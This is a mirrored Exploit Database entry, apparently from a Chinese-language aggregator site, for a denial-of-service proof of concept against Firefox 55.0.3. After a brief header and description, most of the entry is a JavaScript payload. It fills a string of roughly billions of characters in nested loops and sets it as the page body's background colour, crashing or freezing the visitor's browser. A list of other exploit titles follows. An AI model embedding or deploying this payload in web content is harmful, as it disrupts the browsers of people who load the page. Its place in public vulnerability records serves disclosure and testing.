Firefox 55.0.3 – Denial of Service (PoC)

Exploit Database
14 阅读

作者： L0RD

日期： 2018-08-27
类别：
- dos
平台：
- windows_x86-64
来源：https://www.exploit-db.com/exploits/45257/

# Exploit Title: Firefox 55.0.3 - Denial of Service (PoC)
# Date: 2018-08-26
# Exploit Author: L0RD
# Vendor Homepage: mozilla.org
# Software Link: https://www.mozilla.org/en-US/firefox/55.0.3/releasenotes/
# Version: 55.0.3
# Tested on: Windows 10
# CVE: N/A

# Description :
# An issue was discovered in firefox 55.0.3 which an attacker can create a
# webpage and put javascript payload to crash user's browser or put user in
# non-responsive state.

# Exploit :

/* We don't need to create any element on webpage.we just set body
attribute with our buffer variable*/
<script>
var buffer = "";
for(var i=0;i<0x11170;i++){
for(j=0;j<=0x9C40;j++){
buffer += "\x44";
}
}
document.body.style.backgroundColor = buffer;
</script>

last Exploits
Firefox 55.0.3 – Denial of Service (PoC)的更多信息

FTP Voyager 16.2.0 – Denial of Service (PoC)：
Kaspersky AntiVirus – VB6 Parsing Integer Overflow：
Apple macOS 10.15.1 – Denial of Service (PoC)：
WebRTC – H264 NAL Packet Processing Type Confusion：
Wireshark 2.4.0 < 2.4.2 / 2.2.0 < 2.2.10 - CIP Safety Dissector Crash：
Adobe Flash MovieClip.startDrag – Use-After-Free：
Brave Browser < 0.13.0 - 'window.close(self)' Denial of Service：
Putty 0.64 – Denial of Service：